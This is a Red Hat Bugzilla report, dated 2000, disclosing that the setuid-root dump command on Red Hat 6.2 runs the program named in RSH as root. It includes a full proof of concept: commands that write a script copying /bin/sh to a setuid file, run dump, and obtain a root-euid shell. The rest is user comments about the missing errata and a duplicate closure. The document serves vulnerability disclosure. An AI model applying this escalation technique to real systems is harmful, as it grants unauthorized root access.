Red Hat Bugzilla – Bug 20112
dump executes $RSH with root privs
Last modified: 2007-03-26 23:37:10 EDT
From: JW Oh <mat@IVNTECH.COM>
Subject: Redhat 6.2 dump command executes external program with suid
Date: Tue, 31 Oct 2000 14:37:35 +0900
Linux dump command executes external program with suid priviledge.
2. Tested Version
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
DUMP: Connection to garbage established.
DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
| firstname.lastname@example.org |
WTF is dump on RH <7 setuid root anyway? RH7 dump is chmod 755 as it should be.
And another question: as Red Hat decided to remove the suid bit on RH7
(obviously because of security concerns), why didn't we see a security errata
update for RH 6.x at the time this decision was made? Do all vulnerabilites
have to get exploited and/or posted to BugTraq before actions get taken?
Admitted, I'm "a little bit" pissed right now.
Closing this report as duplicate... email@example.com was a minute faster than
*** This bug has been marked as a duplicate of 20111 ***